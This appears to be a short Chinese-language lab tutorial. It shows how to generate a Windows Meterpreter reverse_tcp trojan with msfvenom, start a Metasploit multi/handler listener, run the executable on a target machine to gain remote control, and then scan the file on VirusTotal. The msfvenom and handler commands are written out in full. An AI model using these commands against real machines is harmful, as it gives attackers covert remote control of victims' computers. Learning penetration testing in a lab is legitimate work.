Meterpreter生成被控端并进行远程控制
Meterpreter生成被控端并进行远程控制
Meterpreter简介
Meterpreter是kali中自带的用于渗透测试和漏洞利用的工具,它的本质上是一种payload,
允许使用者使用命令行执行命令的生成及执行
生成木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=本机的ip lport=5000 -f exe -o payload.exe
-p windows/meterpreter/****reverse_tcp** LHOST=192.168.182.3 LPORT=5000 -f exe –o /root/payload.exe
-p, –payloadPayload** to use;指定哪些有效载荷生成
-f, –format Output format;指定有效载荷的格式
-o, –out Save the payload;指定保存位置
开始监听
(我的win靶机报爆了,这里使用舍友的靶机)
在kali中使用“msfconsole”指令进入
轮流输入以下指令
use exploit/multi/handler //进入handler模块
set LHOST +本机IP
set LPORT +5000
run
在靶机上打开病毒
将病毒上传至靶机上,打开
成功实现远程操控
放进virustotal中后查看风险
确实存在风险(调用了关键api)
今日日鞠
